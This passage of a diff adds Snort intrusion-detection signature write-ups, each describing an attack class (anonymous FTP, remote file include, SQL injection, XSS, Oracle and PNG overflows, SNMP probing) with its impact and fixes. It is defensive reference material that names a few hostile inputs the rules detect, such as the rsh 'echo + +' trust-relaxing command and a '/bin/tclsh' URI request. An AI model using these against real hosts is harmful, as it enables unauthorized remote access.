+Information gathering or remote access.  This activity may be a precursor to navigating through the accessible directories on the anonymous FTP server to do reconnaissance of the server.  Alternately, this may be a precursor of attempting an exploit, such as a buffer overflow, that may permit remote access to the vulnerable FTP server.
+
+--
+Detailed Information: 
+FTP servers may permit anonymous user access to share authorized public files.  FTP servers must have tighly restricted permissions to prevent anonymous users from navigating or writing to unauthorized directories.  If permissions are incorrectly assigned, an attacker may attempt to store unauthorized "warez" files of pirated software.  Alternately, anonymous access to a vulnerable FTP server may permit an attacker to exploit a buffer overflow, permitting execution of arbitrary commands on the host.
+
+--
+Affected Systems: 
+FTP servers allowing anonymous user access
+
+--
+Attack Scenarios: 
+An attacker may employ anonymous user access to do reconnaissance, store unauthorized files, or attempt an exploit on a vulnerable FTP server. 
+
+--
+Ease of Attack: 
+Simple
+
+--
+False Positives: 
+If anonymous user access is knowingly permitted, this rule may fire.  Consider disabling this rule to anonymous FTP server.
+
+--
+False Negatives: 
+An attacker may use the username "ftp" instead of "anonymous" to gain anonymous access.
+
+--
+Corrective Action: 
+Disable anonymous access on the FTP server if it is not required.
+
+--
+Contributors: 
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2577.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2577
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Microsoft Internet Explorer.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible.
+
+--
+Detailed Information:
+Internet Explorer does not correctly handle the validation of data from
+an external source when processing data in a frame from a redirected
+source. This may lead to the execution of arbitrary code in the context
+of the Local Machine zone.
+
+It may be possible for an attacker to supply an HTTP 300 response from a
+webserver that points to a local file on the victim host. If the
+attacker includes code of their choosing, this code is executed in the
+context of the trusted Local Machine zone.
+
+--
+Affected Systems:
+	Microsoft Internet Explorer
+	Microsoft Outlook
+	Microsoft Outlook Express
+
+--
+Attack Scenarios:
+An attacker would need to supply an HTTP 300 series code to redirect the
+contents of a frame to a local resource on the victim host.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+A valid 300 server response that uses the Location parameter to redirect
+users to a new location may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Disable Active Scripting and ActiveX
+
+Disable the use of HTML email
+
+Use a browser other than Internet Explorer
+
+--
+Contributors:
+Original Snort documentation contributed by nnposter@users.sourceforge.net
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/449.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+449
+
+--
+Summary:
+This event is generated when a routing device detects that a packet has exceeded the maximum number of allowable hops. 
+
+--
+Impact:
+Informational.  This indicates that a packet has been expired by an internal router.  This may be an indication of an attacker attempting a traceroute of a host in your network. 
+
+--
+Detailed Information:
+Each packet is assigned an initial Time To Live (TTL) value before being sent.  This value is usually determined by the operating system of the given TCP/IP stack.  The TTL value represents the maximum number of hops a packet may take before being expired by a routing device.  This is done to banish lost or misguided packets from the network.  The traceroute utility assigns its own TTL values to dictate the number of hops a packet takes, to discover all the routing devices that are traversed by a packet.  During the process, an ICMP "Time Exceeded in Transit" message may be observed. If a router in your network sends this message, it may be an indication that an attacker is attempting a traceroute of a host in your network.
+
+--
+Affected Systems:
+Any device that expires a packet will generate this ICMP message.
+
+--
+Attack Scenarios:
+An attacker may attempt a traceroute to discover your routing devices and network topology.
+
+--
+Ease of Attack:
+Simple. The UNIX traceroute and Windows tracert are provided utilities.
+
+--
+False Positives:
+It is possible to observe an ICMP "Time Exceeded in Transit" message sent outbound if any inbound packet has exceeded the maximum allowable hops.  This may be a indication of a lost packet or routing problems such as a routing loop.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Sites may elect to disable this ICMP message on the outbound interface to prevent releasing potentially value reconnaissance about the network topology.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2141.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 2141
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in the php application shoutbox. 
+
+--
+Impact:
+Information gathering possible execution of arbitrary code and remote access to the host.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a weakness in the php application shoutbox. Specifically the rule generates an event when directory traversal is attempted.
+
+The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack against that host using that information.
+
+--
+Affected Systems:
+Any host using php.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the host. The attacker might then gain administrator access to the host or execute arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1103.txt
@@ -0,0 +1,64 @@
+Rule:
+--
+Sid:
+1103
+--
+Summary:
+This event is generated when a client is requesting a file that may 
+contain an administrator name and password.
+
+--
+Impact:
+An attacker may be able to gain administrator access to your web server.
+
+--
+Detailed Information:
+Some versions of Netscape Enterprise Server  put a world readable text 
+file containing the administrator user name and encrypted password in a 
+standard location within the URI space. By acessing this, an attacker 
+may be able to brute force guess or even decrypt the password.
+
+--
+Affected Systems:
+	Netscape Enterprise/3.6 SP3
+	Netscape Fasttrack/3.0.2
+	Netscape Messaging Server/3.6
+	Netscape Messaging Server/4.15p2
+	Netscape Collabra Server/3.54
+
+--
+Attack Scenarios:
+This is an information gathering operation that could allow an attacker 
+to execute a brute force password guessing attack.
+
+--
+Ease of Attack:
+Moderate.   The file is easy enough to get access to, but the password 
+is still encrypted.
+
+--
+False Positives:
+None.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Set appropriate permissions on this file or upgrade your web server 
+software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+Secureiteam
+http://www.securiteam.com/securitynews/5OR040A1UG.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000406.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000406
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "approb.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "approb.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1827.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1827
+
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted, or a potential attacker is testing your site to determine if 
+it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site. Attackers can potentially gain access to your users' 
+cookies or session ids, allowing the attacker to impersonate your
+user. They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input (either via the URL or the 
+POST method) and then uses that input as part of the HTML of a new page 
+without filtering, the application is vulnerable to cross-site 
+scripting.  The traditional means of exploiting this is to embed a 
+"<SCRIPT>" tag into the input. The code following the tag is then 
+executed by the victim's browser.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable. 
+
+Finding vulnerabilities in other, including proprietary, web
+applications is fairly trivial and existing exploit code could easily be
+modified to take advantage of newly discovered vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the <SCRIPT> tag could generate this 
+event under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, contact 
+the authors or vendor and see if there is a patch or newer version.
+
+If the application is proprietary to you or your company, ensure that it 
+properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/603.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 603
+
+--
+Summary: 
+This event is generated when an attempt to modify access control permissions for remote shell logins is attempted.
+
+--
+Impact: 
+An attacker may have modified remote login permissions such that any host is allowed to initiate a remote session on the target host.
+
+-- 
+Detailed Information: 
+The rule generates an event when system reconfiguration is attempted via "rsh". 
+
+The command "echo + +" is used to relax access control permissions for r-services to allow access from any site without the need for password authentication. 
+
+This activity is indicative of attempts to abuse hosts using a default configuration. 
+
+Some UNIX systems use the "rsh" service to allow a connection to the machine for establishing an interactive session.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with "rsh" enabled and reconfigures it to allow access from any location
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS385
+
+--
--- /dev/null
+++ b/doc/signatures/815.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+815
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000619.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000619
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_validate_edit.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_validate_edit.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1011.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1011
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1206.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1206
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000808.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000808
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "AjaxPortal" application running on a webserver. Access to the file "ajaxp.php" with SQL commands being passed as the "username" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "username" parameter in the "ajaxp.php" script used by the "AjaxPortal" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using AjaxPortal
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1459.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1459
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/893.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+893
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the CGI web application webdist.cgi running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited
+by the attacker.
+
+In particular this event is generated when an attempt is made to access
+"MachineInfo" using the CGI application webdist.cgi, distributed with
+IRIX operating systems using the package IRIX Mindshare OutBox.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	IRIX 5.x
+	IRIX 6.x
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-1997-12.html
+
+--
--- /dev/null
+++ b/doc/signatures/2642.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2642
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_site_instantiate" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "refresh_template_name"
+variable to cause the overflow. The result could permit the attacker
+to gain escalated privileges and run code of their choosing. This
+attack requires an attacker to logon to the database with a valid
+username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck629.html
+
+--
--- /dev/null
+++ b/doc/signatures/3132.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3132
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the processing of a Portable Network Graphics (PNG) file by
+the GD Graphics Library.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way that software that handles PNG files,
+libpng, allocates memory for PNG images. A maliciously formatted PNG
+image sent to a vulnerable server may cause a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.  A
+PNG file with an excessively large image height, width, or depth, or
+combination of these can cause a buffer overflow.
+
+--
+Affected Systems:
+	GD Graphics Library 2.0.28 and earlier
+
+--
+Attack Scenarios:
+An attacker can create a malformed PNG file and upload it to a web server,
+possibly causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2467.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2467
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2796.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2796
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure register_mview_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1351.txt
@@ -0,0 +1,47 @@
+Rule:
+
+--
+Sid:
+1351
+
+--
+Summary:
+Attempted tclsh command access via web
+
+--
+Impact:
+Attempt to excute a tclsh command on a webserver
+
+--
+Detailed Information:
+This is an attempt to execute a tclsh command or script on a webserver. tclsh is a shell application that reads tcl commands and evaluates them. The attacker could possibly execute a command or script on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/tclsh'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine.
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1352
+
+--
--- /dev/null
+++ b/doc/signatures/1418.txt
@@ -0,0 +1,77 @@
+Rule:
+  
+--
+Sid:
+1418
+
+--
+
+Summary:
+This event is generated when an SNMP-Trap connection over TCP to an SNMP
+daemon is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+The SNMP (Simple Network Management Protocol) Trap daemon usually 
+listens on port 161, tcp or udp.
+
+An attacker may attempt to send this request to determine if a device is
+using SNMP.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons on well known ports.
+
+--
+
+Attack Scenarios:
+An attacker sends a packet directed to tcp port 161, if sucessful a 
+reply is generated and the attacker may then launch further attacks 
+against the SNMP daemon.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Use a packet filtering firewall to protect devices using the SNMP 
